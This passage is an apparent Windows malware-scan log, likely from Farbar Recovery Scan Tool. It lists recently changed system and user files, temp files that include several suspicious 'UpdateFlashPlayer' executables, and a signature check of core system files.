2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-TW
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-CN
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sv-SE
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ru-RU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-PT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-BR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pl-PL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nl-NL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nb-NO
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ko-KR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ja-JP
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\it-IT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hu-HU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fr-FR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fi-FI
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\el-GR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\de-DE
2014-10-25 11:59 - 2014-02-20 19:10 - 00000000 ____D () C:\Windows\pss
2014-10-25 07:53 - 2014-02-20 19:45 - 00001067 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-10-25 07:53 - 2014-02-20 19:45 - 00001055 _____ () C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-10-25 07:49 - 2013-11-25 12:08 - 00000000 ___RD () C:\Users\Jack\Dropbox
2014-10-25 07:49 - 2013-11-25 12:01 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Dropbox
2014-10-25 07:48 - 2014-04-06 08:13 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2014-04-06 08:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2013-11-25 12:14 - 00001067 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-24 22:18 - 2013-11-25 12:13 - 00000972 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-24 22:18 - 2013-11-25 12:13 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 22:10 - 2014-04-26 17:44 - 00192512 _____ () C:\Users\Jack\AppData\Local\ChromeHitoryDB
2014-10-24 20:37 - 2009-07-13 21:04 - 00000505 _____ () C:\Windows\win.ini
2014-10-18 20:29 - 2009-07-13 23:53 - 00032538 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-18 13:59 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-10-16 02:33 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 02:24 - 2009-07-13 23:46 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 02:23 - 2009-07-13 23:33 - 00315464 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:22 - 2014-04-30 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:04 - 2013-11-25 11:58 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:02 - 2013-11-25 11:58 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
 
Some content of TEMP:
====================
C:\Users\Jack\AppData\Local\temp\Quarantine.exe
C:\Users\Jack\AppData\Local\temp\sqlite3.dll
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_12799334.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_3428f999.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_53e3e523.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_80e9a296.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_d12a4f0f.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_ef63aed8.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-11-09 01:53
 
==================== End Of Log ============================




